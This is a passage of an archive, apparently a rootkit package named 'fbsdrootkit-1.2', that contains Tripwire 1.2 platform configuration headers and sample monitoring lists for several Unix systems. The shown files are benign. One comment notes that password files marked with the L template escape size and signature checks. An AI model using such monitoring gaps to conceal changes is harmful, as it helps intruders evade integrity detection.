a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? 
*/ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-irix4.h100600 764 764 1665 5434607441 17100 0ustar dfdf/* $Id: conf-irix4.h,v 1.2 1993/08/19 05:26:57 genek Exp $ */ /* * conf-irix4.h * * Tripwire configuration file * * Gene Kim * Purdue University * * IRIX4 port by: * Simon Leinen * Ecole Polytechnique Federale de Lausanne */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * does your system have lstat() */ #define HAVE_LSTAT /* * is #include ok? (as opposed to ) */ #define STRINGH fbsdrootkit-1.2/tripwire-1.2/configs/conf-linux.h100600 764 764 1570 5613607566 17202 0ustar dfdf/* $Id: conf-linux.h,v 1.1 1994/07/22 00:14:46 gkim Exp $ */ /* * conf-dynix.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? 
*/ #define GETHOSTNAME #define TW_LINUX fbsdrootkit-1.2/tripwire-1.2/configs/conf-mach.h100600 764 764 2135 5434607442 16743 0ustar dfdf/* $Id: conf-mach.h,v 1.2 1993/08/19 05:26:58 genek Exp $ */ /* * conf-mach.h * * Tripwire configuration file * * Peter Shipley * TFS (TRW Financial Systems) */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ /* MACH has readdir(3) but no include file */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME /* * miscellaneous stuff */ #define MACH 1 /* MACH seems to be missing the define for S_IFIFO [but is had S_ISFIFO() ] */ #ifndef S_IFIFO #define S_IFIFO 0010000 #endif fbsdrootkit-1.2/tripwire-1.2/configs/conf-motoR3.h100600 764 764 2232 5611466322 17211 0ustar dfdf/* * conf-svr3.h * * Tripwire configuration file * * Kevin Johnson * Motorola Computer Group * * Notes: I used GCC 2.4.5 to compile (didn't even try the stock compiler). * I've still got a few minor bugs in the port that I'm trying to track down. * It works, but occasionally complains about things - rerun it and * everything's fine - probably some pointer problem... * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV #define SYSV 3 /* * does your system have a like System V? 
*/ #define MALLOCH /* * does your system have a like POSIX says you should? */ /* #define STDLIBH */ /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define MAXPATHLEN 255 fbsdrootkit-1.2/tripwire-1.2/configs/conf-motoR32.h100600 764 764 1741 5611466323 17300 0ustar dfdf/* * conf-svr3.h * * Tripwire configuration file * * Kevin Johnson * Motorola Computer Group * * Notes: I used gcc 2.4.5 to compile. Didn't even try compiling it * with the stock C compiler. * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define MAXPATHLEN 255 fbsdrootkit-1.2/tripwire-1.2/configs/conf-motoR4.h100600 764 764 1553 5611466324 17221 0ustar dfdf/* * conf-motoR4.h * * Tripwire configuration file * * Kevin Johnson * Motorola Computer Group * * Notes: use /usr/ucb/cc to compile. * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 4 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? 
*/ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ /* #define DIRENT */ /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-odt2.h100600 764 764 1651 5611466325 16705 0ustar dfdf/* * conf-odt2.h * * Tripwire configuration file * * * Mark Kohler * Intellex Computer Consulting * kohler@dcs.umd.edu * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define MAXPATHLEN 1024 #define NOGETTIMEOFDAY fbsdrootkit-1.2/tripwire-1.2/configs/conf-osf1.h100600 764 764 1627 5611466327 16712 0ustar dfdf/* $Id: conf-osf1.h,v 1.3 1994/07/15 11:02:47 gkim Exp $ */ /* * conf-osf1.h * * Tripwire configuration file * * Gene Kim * Purdue University * * OSF/1 port by: * Rich Salz */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system have gethostname(2) (instead of uname(2))? 
*/ #define GETHOSTNAME /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH fbsdrootkit-1.2/tripwire-1.2/configs/conf-osx-att.h100600 764 764 1361 5434607444 17434 0ustar dfdf/* $Id: conf-osx-att.h,v 1.2 1993/08/19 05:27:00 genek Exp $ */ /* * conf-osx-att.h * * Tripwire configuration file for Pyramid's OSx and att universe * * Ken McDonell * Pyramid Technology * */ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #undef STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-osx-ucb.h100600 764 764 1444 5434607446 17421 0ustar dfdf/* $Id: conf-osx-ucb.h,v 1.2 1993/08/19 05:27:02 genek Exp $ */ /* * conf-osx-ucb.h * * Tripwire configuration file for Pyramid's OSx and ucb universe * * Ken McDonell * Pyramid Technology * */ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? * -- yes, but we do not have a to #include */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #undef STRINGH /* * does your system have gethostname(2) (instead of uname(2))? 
*/ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-ptx2.h100600 764 764 4563 5474057110 16732 0ustar dfdfFrom a4mp@loki.cc.pdx.edu Wed Oct 6 18:12:34 1993 Return-Path: Received: from arthur.cs.purdue.edu by barnum.cs.purdue.edu (5.65c/PURDUE_CS-1.2) id ; Wed, 6 Oct 1993 18:12:33 -0500 Received: from pdxgate.cs.pdx.edu by arthur.cs.purdue.edu (5.65c/PURDUE_CS-1.2) id ; Wed, 6 Oct 1993 18:12:28 -0500 Received: from loki.cc.pdx.edu by pdxgate.cs.pdx.edu (4.1/pdx-gateway-evision: 1.30 id AA25253; Wed, 6 Oct 93 16:12:21 PDT Received: from loki.cc.pdx.edu by loki.cc.pdx.edu (5.65/pdx-client-evision: 1.19F id AA14453; Wed, 6 Oct 93 23:12:09 GMT From: a4mp@loki.cc.pdx.edu (Michael Perrone) Message-Id: <9310062312.AA14453@loki.cc.pdx.edu> Subject: Re: Ptx 2.0 files for tripwire 1.0.4 To: spaf (Gene Spafford) Date: Wed, 6 Oct 93 16:12:07 PDT Cc: gkim In-Reply-To: <199310040639.AA24668@uther.cs.purdue.edu>; from "Gene Spafford" at Oct 4, 93 1:39 am X-Mailer: ELM [version 2.3 PL11] Status: ORr Gene Spafford writes: > > Please send the files to us -- we'd love to have them in the next > release! > > --spaf > Okay, what follows is "conf-ptx2.h" I'll let you know if this file works under ptx 2.1 in a week or two. -- Michael Perrone -- -------- CUT HERE ------------- /* conf-ptx2.h * * Tripwire configuration file * * Michael Perrone -- a4mp@loki.cc.pdx.edu * Portland State University */ /* include file for bsd types such as u_long */ #include /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * Even though ptx 2 is based on SVR4, there is some stuff * missing that tripwire expects for SYSV = 4 */ #define SYSV 3 /* * ptx has never had this - use system call "time" */ #define NOGETTIMEOFDAY /* * does your system have a like System V? * ptx does */ #define MALLOCH /* * does your system have a like POSIX says you should? 
* ptx has stdlib.h */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? * ptx does */ #define DIRENT /* * is #include ok? (as opposed to ) * ptx uses */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? * ptx provides both calls. */ #undef GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-riscos.h100600 764 764 1676 5434607447 17353 0ustar dfdf/* $Id: conf-riscos.h,v 1.2 1993/08/19 05:27:03 genek Exp $ */ /* * conf-riscos4.h (for SYSTYPE_BSD43) * * Tripwire configuration file * * Gene Kim * Purdue University * * Ported to RiscOS * Harlan Stenn */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-sco.h100600 764 764 1672 5532334026 16616 0ustar dfdf/* $Id: conf-sco.h,v 1.1 1994/02/22 07:45:26 gkim Exp $ */ /* * conf-sco.h * * Tripwire configuration file * * Gene Kim * Purdue University * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? 
(as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define NOGETTIMEOFDAY #define MAXPATHLEN PATH_MAX fbsdrootkit-1.2/tripwire-1.2/configs/conf-sco2.h100600 764 764 1720 5611466330 16674 0ustar dfdf/* $Id: conf-sco2.h,v 1.1 1994/07/15 11:02:48 gkim Exp $ */ /* * conf-sco.h * * Tripwire configuration file * * Gene Kim * Purdue University * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define NOGETTIMEOFDAY #define PATH_MAX 200 #define MAXPATHLEN PATH_MAX fbsdrootkit-1.2/tripwire-1.2/configs/conf-sunos-4.0.h100600 764 764 1620 5434607450 17476 0ustar dfdf/* $Id: conf-sunos-4.0.h,v 1.2 1993/08/19 05:27:04 genek Exp $ */ /* * conf-sunos-4.0.h (SunOS versions prior to 4.1) * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? 
(as opposed to <strings.h>) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-sunos-4.1.h100600 764 764 1613 5434607451 17502 0ustar dfdf/* $Id: conf-sunos-4.1.h,v 1.2 1993/08/19 05:27:05 genek Exp $ */ /* * conf-sunos-4.1.h (SunOS versions >= 4.1) * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivative? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a <malloc.h> like System V? */ #define MALLOCH /* * does your system have a <stdlib.h> like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include <string.h> ok? (as opposed to <strings.h>) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-svr3.h100600 764 764 1646 5434607452 16737 0ustar dfdf/* $Id: conf-svr3.h,v 1.2 1993/08/19 05:27:06 genek Exp $ */ /* * conf-svr3.h * * Tripwire configuration file * * Gene Kim * Purdue University * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivative? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a <malloc.h> like System V? */ #define MALLOCH /* * does your system have a <stdlib.h> like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include <string.h> ok? (as opposed to <strings.h>) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? 
*/ #undef GETHOSTNAME /* * missing defines */ #define MAXPATHLEN PATH_MAX fbsdrootkit-1.2/tripwire-1.2/configs/conf-svr4.h100600 764 764 1552 5434607453 16735 0ustar dfdf/* $Id: conf-svr4.h,v 1.2 1993/08/19 05:27:07 genek Exp $ */ /* * conf-svr4.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 4 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-umaxv.h100600 764 764 2112 5476717460 17176 0ustar dfdf/* $Id: conf-umaxv.h,v 1.3 1993/11/30 19:29:52 genek Exp $ */ /* * conf-umaxv.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Modified by Michael Barnett (mikeb@rmit.edu.au) for UMAX V R2.4.1. * Modified by Georges Tomazi (tomazi@kralizec.zeta.org.au) for UMAX V 2.4.1.P3 * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 2 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? 
*/ #define GETHOSTNAME /* * miscellaneous stuff - mnb */ #define MAXPATHLEN PATH_MAX fbsdrootkit-1.2/tripwire-1.2/configs/conf-unicos.h100600 764 764 2010 5434607455 17327 0ustar dfdf/* $Id: conf-unicos.h,v 1.2 1993/08/19 05:27:09 genek Exp $ */ /* * conf-unicos.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Unicos port by: * Michael Barnett */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * miscallaneous stuff -mnb */ #define UNICOS #define MAXPATHLEN PATH_MAX fbsdrootkit-1.2/tripwire-1.2/configs/conf-xenix.h100600 764 764 2056 5434607456 17175 0ustar dfdf/* $Id: conf-xenix.h,v 1.3 1993/08/19 05:27:10 genek Exp $ */ /* * conf-xenix.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Xenix port by: * Daniel Ray */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? 
*/ #undef GETHOSTNAME /* * To work around lack of gettimeofday() in src/dbase.build.c */ #define NOGETTIMEOFDAY /* * miscellaneous stuff */ #define XENIX fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.386bsd100600 764 764 7136 5474057111 17252 0ustar dfdf# $Id: tw.conf.386bsd,v 1.1 1993/11/22 06:38:01 genek Exp $ # # tripwire.config # Generic version for 386BSD # Will need editing...see comments below # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following attributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unnecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. 
# # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist # Unix itself /386bsd R # /bin and exceptions /bin R-2 /bin/mail R /bin/rcp R /bin/rnews R # /dev /dev L # /etc and exceptions # NOTE: the L template (+pinug-sam12) ignores size, timestamps and both # signatures, so an edit to one of the password files marked L below that # keeps its mode, inode, link count and owner is not reported; use a # stricter mask where such changes should be seen. 
/etc R-2 /etc/aliases L /etc/daily L /etc/disktab L /etc/dumpdates L /etc/master.passwd L /etc/monthly L /etc/motd L /etc/passwd L /etc/pwd.db L /etc/spwd.db L /etc/uucp L /etc/weekly L # /home =/home # /news/lib /news/lib/inews R /news/lib/nnmaster R # /root /root R-2 /root/.history L # /sbin /sbin R-2 # /usr/bin /usr/bin R-2 /usr/include R-12 /usr/lib R-2 /usr/libexec R-2 /usr/local/bin R-2 /usr/local/etc L /usr/local/lib/mail L /usr/sbin R-2 /usr/src/bin R-2 /usr/src/lib R-2 /usr/src/libexec R-2 /usr/src/sbin R-2 /usr/src/usr.bin R-2 /usr/src/usr.sbin R-2 /usr/src/sys.386bsd R-2 !/usr/src/sys.386bsd/compile !/usr/src/sys.386bsd/conf !/usr/src/sys.386bsd/i386/conf ########################################### fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.apollo100600 764 764 11613 5532334027 17541 0ustar dfdf# Sample config file for Apollos. 
# IMPORTANT: The permissions on Apollos, as freshly installed, # are a total disaster as far as security is concerned. If you # care about security, get hold of some scripts I have # available for anonymous FTP from maths.su.oz.au in directory # protect (and also mirror sites, notably ftp.eb.ele.tue.nl). # Also note that tripwire does not understand the intricacies # of Apollo ACLs (initial file/directory ACLs, extended ACLs, # permissions for organizations, subsystem managers: # 'subsystem login manager' is better than 'setuid root'). # Try to include everything, except what we know changes on a # running system, and things that would make tripwire hang or # bomb (or hang the node). Or you may want # +pugs15-inamc02346789 (and +pug-insamc0123456789) so you can # use the same database file on all nodes (??!!). / +pinugsmc15-a02346789 /bsd4.3/usr/lib/sendmail.st +pinug-samc0123456789 !/etc/gated.pid R !/etc/gated.version R /etc/group +pinug-samc0123456789 /etc/org +pinug-samc0123456789 /etc/passwd +pinug-samc0123456789 !/etc/sendmail.pid R =/install +pinug-samc0123456789 /lost+found.list +pinug-samc0123456789 !/sys/ns/helper_data/ns_helper.db R !/sys/ns/helper_data/ns_helper.prop R !/sys/registry/rgy_data R /sys/registry/rgy_local +pinug-samc0123456789 /sys/registry/rgy_local.bak +pinug-samc0123456789 =/usr/spool/mqueue +pinug-samc0123456789 # Remember to repeat the node_data block for all diskless # nodes (i.e. all node_data.nnnnn trees). 
/sys/node_data/dev/crp00 +pinug-samc0123456789 /sys/node_data/dev/crp01 +pinug-samc0123456789 /sys/node_data/dev/crp02 +pinug-samc0123456789 /sys/node_data/dev/crp03 +pinug-samc0123456789 /sys/node_data/dev/crp04 +pinug-samc0123456789 /sys/node_data/dev/crp05 +pinug-samc0123456789 /sys/node_data/dev/crp06 +pinug-samc0123456789 /sys/node_data/dev/crp07 +pinug-samc0123456789 /sys/node_data/dev/crp08 +pinug-samc0123456789 /sys/node_data/dev/crp09 +pinug-samc0123456789 /sys/node_data/dev/crp10 +pinug-samc0123456789 /sys/node_data/dev/crp11 +pinug-samc0123456789 /sys/node_data/dev/crp12 +pinug-samc0123456789 /sys/node_data/dev/crp13 +pinug-samc0123456789 /sys/node_data/dev/crp14 +pinug-samc0123456789 /sys/node_data/dev/crp15 +pinug-samc0123456789 !/sys/node_data/dpci1_trace1 R !/sys/node_data/dpci1_trace2 R !/sys/node_data/dpci1_trace3 R !/sys/node_data/dpci1_xpombx1 R !/sys/node_data/dpci1_xpombx2 R !/sys/node_data/dpci1_xpombx3 R !/sys/node_data/dpci_dump_log R !/sys/node_data/dpcinet_trace0 R !/sys/node_data/dpcinet_trace1 R !/sys/node_data/dpcinet_trace2 R !/sys/node_data/dpcinet_trace3 R !/sys/node_data/dpcinet_trace4 R !/sys/node_data/dpcinet_xpombx R !/sys/node_data/dpcipcc_server0 R !/sys/node_data/dpcipcc_server_trace0 R !/sys/node_data/dpcipcc_trace0 R !/sys/node_data/dpcipcc_xpombx R /sys/node_data/etc/.rgyloc +pinug-samc0123456789 /sys/node_data/etc/fstab +pinug-samc0123456789 /sys/node_data/etc/mnttab +pinug-samc0123456789 !/sys/node_data/etc/named.pid R !/sys/node_data/etc/syslog.pid R /sys/node_data/etc/utmp +pinug-samc0123456789 !/sys/node_data/glb.d R !/sys/node_data/glb.r R !/sys/node_data/hint_file R /sys/node_data/ipc_data +pinug-samc0123456789 !/sys/node_data/os_paging_file R =/sys/node_data/paste_buffers +pinug-samc0123456789 =/sys/node_data/proc_dir +pinug-samc0123456789 =/sys/node_data/system_logs +pinug-samc0123456789 =/sys/node_data/systmp +pinug-samc0123456789 =/sys/node_data/tmp +pinug-samc0123456789 =/sys/node_data/usrtmp 
+pinug-samc0123456789 fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.hp2100600 764 764 12543 5434607457 16762 0ustar dfdf# $Id: tw.conf.hp2,v 1.3 1993/08/19 05:27:11 genek Exp $ # # tripwire.config # Generic version for HP/UX # # Joe Polcari # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following attributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unnecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. 
# # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist #/.exrc R # may not exist /.logout R # may not exist #/.emacs R # may not exist /.forward R # may not exist #/.netrc R # may not exist /.defaults R /.suntools R /.mailrc R /.kermrc R /.newsrc R # Unix itself /vmunix R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/inetd.conf R /etc/rc R /etc/rc.boot R /etc/rc.local R-2 /etc/rc.single R #/etc/rc.ip R /etc/ttytab R /etc/exports R /etc/ttys L /etc/dumpdates L /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L /var L /dev E /usr/etc R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. 
